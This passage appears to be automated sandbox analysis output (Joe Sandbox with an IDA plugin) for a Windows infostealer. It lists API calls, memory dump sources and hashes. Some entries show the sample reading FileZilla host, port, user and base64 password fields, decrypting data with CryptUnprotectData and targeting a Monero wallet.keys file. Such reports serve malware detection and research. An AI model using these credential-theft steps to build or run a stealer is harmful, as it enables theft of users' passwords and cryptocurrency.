                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID: Na
                          • API String ID: 4291131564-2961090521
                          • Opcode ID: 42a445752a22f0de29819434853911c1189ad849f348e45e3faf1ad605fb25a9
                          • Instruction ID: 78471a27ce8be8cc0af4eaf12621926f3b3a27d0d41ff3a84cbe8ef4bcc31b1b
                          • Opcode Fuzzy Hash: 42a445752a22f0de29819434853911c1189ad849f348e45e3faf1ad605fb25a9
                          • Instruction Fuzzy Hash: 5B11A2B4240308AFEB14CF64DC95FAA77B5FB89701F208159FA159B390C7B6A941CBA0
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0061C871
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0061C87C
                          • lstrcat.KERNEL32(?,00630B46), ref: 0061C943
                          • lstrcat.KERNEL32(?,00630B47), ref: 0061C957
                          • lstrcat.KERNEL32(?,00630B4E), ref: 0061C978
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: 186e8469670939deef3c846a54d29736794c1609e23da01853dbae2bc790692d
                          • Instruction ID: d73d828323c55e2cce0c7642a8e2a914f24626da41311db3d2ed0997977e34b7
                          • Opcode Fuzzy Hash: 186e8469670939deef3c846a54d29736794c1609e23da01853dbae2bc790692d
                          • Instruction Fuzzy Hash: 2341A0B4D0431ADFDB10CFA0DD88BEEF7B9BB48304F1446A8E509A6280D7745A84CF91
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 0062696C
                          • sscanf.NTDLL ref: 00626999
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006269B2
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006269C0
                          • ExitProcess.KERNEL32 ref: 006269DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          • Opcode ID: edfc05308c5ffadd35e07ec492040527f789b9058fa1aac0fe545df63b2b926b
                          • Instruction ID: 24ea5e0ad280b98c5a39f60fd129445c71181fdf9069abb384cbe6e2e16c7e78
                          • Opcode Fuzzy Hash: edfc05308c5ffadd35e07ec492040527f789b9058fa1aac0fe545df63b2b926b
                          • Instruction Fuzzy Hash: DD21EB75D10219ABCF08EFE4E9859EEB7B6BF48301F04852EE406E3250EB345604CB69
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0061724D
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00617254
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00617281
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 006172A4
                          • LocalFree.KERNEL32(?), ref: 006172AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: fe37f9d6d9ee11f7bbf2dd7fd2255fc673cfde5587a2e0f5e9d990c177171ce8
                          • Instruction ID: b43e07766203b804901b8fe4891e1fcc34676b9696e80cbce762bf167bafa942
                          • Opcode Fuzzy Hash: fe37f9d6d9ee11f7bbf2dd7fd2255fc673cfde5587a2e0f5e9d990c177171ce8
                          • Instruction Fuzzy Hash: 53010075A40308BBEB14DFD4CD85F9D77B9BB44701F104154FB05AB2C0D674AA018B65
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0062961E
                          • Process32First.KERNEL32(00630ACA,00000128), ref: 00629632
                          • Process32Next.KERNEL32(00630ACA,00000128), ref: 00629647
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 0062965C
                          • CloseHandle.KERNEL32(00630ACA), ref: 0062967A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: e32b4692d2d47374cdbf35f73c8c1fb8b4e009dde064d2717e46a4e2d8a65776
                          • Instruction ID: 4114e81c529c00c6659f4bb76314ce0a9d0dddd771a014a2cbf73b22f6573084
                          • Opcode Fuzzy Hash: e32b4692d2d47374cdbf35f73c8c1fb8b4e009dde064d2717e46a4e2d8a65776
                          • Instruction Fuzzy Hash: AF010C75A00318ABDB14DFA5DD88BEDBBF9FB48701F104298A909A6240D7349B44CF61
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: O}?$[lg=$j"~_$ox6s
                          • API String ID: 0-1547867405
                          • Opcode ID: 4460ba1c3123cc68d1c2f8652a95212427b58edd912af9e8ebd71f71c063c89f
                          • Instruction ID: 7dd465cc92ed3da8192977231344eb1b367a7a942d7aa18a57b36458c3af9a4f
                          • Opcode Fuzzy Hash: 4460ba1c3123cc68d1c2f8652a95212427b58edd912af9e8ebd71f71c063c89f
                          • Instruction Fuzzy Hash: 24B219F3A0C2049FE3086E2DEC9567ABBE9EF94320F16453DEAC587744EA3558048797
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: F1>y$W7{+$d%F$|[q7
                          • API String ID: 0-3669604176
                          • Opcode ID: b0a6ec2b70337e6c515422d709e813719c4b836e3379e41e00abc772b71b8cea
                          • Instruction ID: d36e500c285596c78ad73e62da266de779ce29eaaff87a6521ba553558aa9fb5
                          • Opcode Fuzzy Hash: b0a6ec2b70337e6c515422d709e813719c4b836e3379e41e00abc772b71b8cea
                          • Instruction Fuzzy Hash: 9DB218F360C2049FE7046E29EC8567ABBEAEFD4720F1A453DE6C4C7744EA3598018697
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,00615184,40000001,00000000,00000000,?,00615184), ref: 00628EC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          • Opcode ID: c05ed17a2b228801b9ac9f6cabbe2cbc39e61b4f6fb1e7cb5bb39811027ba440
                          • Instruction ID: 851462d85b06a26289dfde10d3323006e069a7dafc9da749325c2d34cb799541
                          • Opcode Fuzzy Hash: c05ed17a2b228801b9ac9f6cabbe2cbc39e61b4f6fb1e7cb5bb39811027ba440
                          • Instruction Fuzzy Hash: 8F110370201608BFDB04CF64EC84FAA37AABF89341F109558F9198B250DB39E842DF60
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0111DF18,00000000,?,00630E10,00000000,?,00000000,00000000), ref: 00627A63
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00627A6A
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0111DF18,00000000,?,00630E10,00000000,?,00000000,00000000,?), ref: 00627A7D
                          • wsprintfA.USER32 ref: 00627AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          • Opcode ID: 1cc82cae435535d6e8e46d06d7c63d3354eb048613632ae22776bd7877dd0966
                          • Instruction ID: 1b4e3249997b30915e1a2d328bab7b94817ecbb6ff066db729aaa9a9fbbca956
                          • Opcode Fuzzy Hash: 1cc82cae435535d6e8e46d06d7c63d3354eb048613632ae22776bd7877dd0966
                          • Instruction Fuzzy Hash: F311A5B1945628EBEB14CF54DC55FA9B778FB04722F1043A5E906932C0C7745E40CF51
                          APIs
                          • CoCreateInstance.COMBASE(0062E118,00000000,00000001,0062E108,00000000), ref: 00623758
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 006237B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          • Opcode ID: b3156e131bbb9c17cf4389c19416709e04e537372b705d3560a2c373dc7ead01
                          • Instruction ID: 6a021a10c8a1e2ae1a2ea331af8f2cea11b1e55239ba5f547637a54fbe686f51
                          • Opcode Fuzzy Hash: b3156e131bbb9c17cf4389c19416709e04e537372b705d3560a2c373dc7ead01
                          • Instruction Fuzzy Hash: 80410971A00A289FDB24DF58DC94B9BB7B5BB48702F4081D8E608EB2D0E7756E85CF50
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00619B84
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00619BA3
                          • LocalFree.KERNEL32(?), ref: 00619BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: 308f73c75a5942d3d98b9ccc460b13450ab769be47c41bec47ceafe03781185e
                          • Instruction ID: 8fd2dc5d3501b3870dfa8d485d72bb8f9ad0f596a9cd572542431d1925548c8c
                          • Opcode Fuzzy Hash: 308f73c75a5942d3d98b9ccc460b13450ab769be47c41bec47ceafe03781185e
                          • Instruction Fuzzy Hash: 9011C9B8A00209EFDB04DF94D985AEEB7B5FF88301F104598E915A7350D774AE50CFA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: O_CE$jqn
                          • API String ID: 0-219872878
                          • Opcode ID: 9843c825a904ce8ef9555aa8276c9665bec8db1dae8d4ec98cd46f4179206125
                          • Instruction ID: 086be442f3abc391205ddf7fd61b498ac5526b3c245d6f74c7f6f18492a316bd
                          • Opcode Fuzzy Hash: 9843c825a904ce8ef9555aa8276c9665bec8db1dae8d4ec98cd46f4179206125
                          • Instruction Fuzzy Hash: 04B2F8F36082009FE308AE2DEC9577ABBE9EFD4320F1A453DE6C5C7744EA3558418696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: kBM
                          • API String ID: 0-2784965917
                          • Opcode ID: 162fc4671418f9ad34e4e2bb40c95451581a5d137e591c8cd937fd83f44b2222
                          • Instruction ID: 2dbc73f30ccc827c390e72163aacbffa537986f6d13eed6c8dcbfb5e831b2759
                          • Opcode Fuzzy Hash: 162fc4671418f9ad34e4e2bb40c95451581a5d137e591c8cd937fd83f44b2222
                          • Instruction Fuzzy Hash: 698124B39083189FE3046E3DDC8432AFBD9EB94760F174A3EEAC4D3644E57959058792
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ' uv
                          • API String ID: 0-3485620161
                          • Opcode ID: 366b32958a1e2c62870a030b87f0eaf78a3d381a70a1b0e60c1288a8af3e7ea1
                          • Instruction ID: 24e2d6c36823705dfe45f40075b4983395de27e0be942535cadc42ea6592753c
                          • Opcode Fuzzy Hash: 366b32958a1e2c62870a030b87f0eaf78a3d381a70a1b0e60c1288a8af3e7ea1
                          • Instruction Fuzzy Hash: 495135F3E093105BF3016E29DCC136ABBD6DB98324F2B863DDA8893784E9395C0546C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 82d5adef1a723985f1da7eaa05f0f89a02db1eafb5e23e06c6b08fd9f74bc837
                          • Instruction ID: 825d95d3a41330a350df74f9b95c0e143c00207aa2593a9ed10275585157c67e
                          • Opcode Fuzzy Hash: 82d5adef1a723985f1da7eaa05f0f89a02db1eafb5e23e06c6b08fd9f74bc837
                          • Instruction Fuzzy Hash: 726135F3A082189FE310BE3DEC4576AFBE9EB94350F16853DE9C897384E93558048692
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 21c33109924291e3a8cbf0f2485fae14e5d3267181b70518bfd091ed150e1a90
                          • Instruction ID: 3768a22af1633f94ecb81c18eaff0ad65ae44ebb3dc16f31041d3254e0d59d07
                          • Opcode Fuzzy Hash: 21c33109924291e3a8cbf0f2485fae14e5d3267181b70518bfd091ed150e1a90
                          • Instruction Fuzzy Hash: 016157F3A0C3009BE308AE2DDC957BABBE5EF94720F1A463DE7C583784E97554018692
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 00628DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00628E0B
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                            • Part of subcall function 006199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006199EC
                            • Part of subcall function 006199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00619A11
                            • Part of subcall function 006199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00619A31
                            • Part of subcall function 006199C0: ReadFile.KERNEL32(000000FF,?,00000000,0061148F,00000000), ref: 00619A5A
                            • Part of subcall function 006199C0: LocalFree.KERNEL32(0061148F), ref: 00619A90
                            • Part of subcall function 006199C0: CloseHandle.KERNEL32(000000FF), ref: 00619A9A
                            • Part of subcall function 00628E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00628E52
                          • GetProcessHeap.KERNEL32(00000000,000F423F,00630DBA,00630DB7,00630DB6,00630DB3), ref: 00620362
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00620369
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00620385
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00630DB2), ref: 00620393
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 006203CF
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00630DB2), ref: 006203DD
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00620419
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00630DB2), ref: 00620427
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00620463
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00630DB2), ref: 00620475
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00630DB2), ref: 00620502
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00630DB2), ref: 0062051A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00630DB2), ref: 00620532
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00630DB2), ref: 0062054A
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00620562
                          • lstrcat.KERNEL32(?,profile: null), ref: 00620571
                          • lstrcat.KERNEL32(?,url: ), ref: 00620580
                          • lstrcat.KERNEL32(?,00000000), ref: 00620593
                          • lstrcat.KERNEL32(?,00631678), ref: 006205A2
                          • lstrcat.KERNEL32(?,00000000), ref: 006205B5
                          • lstrcat.KERNEL32(?,0063167C), ref: 006205C4
                          • lstrcat.KERNEL32(?,login: ), ref: 006205D3
                          • lstrcat.KERNEL32(?,00000000), ref: 006205E6
                          • lstrcat.KERNEL32(?,00631688), ref: 006205F5
                          • lstrcat.KERNEL32(?,password: ), ref: 00620604
                          • lstrcat.KERNEL32(?,00000000), ref: 00620617
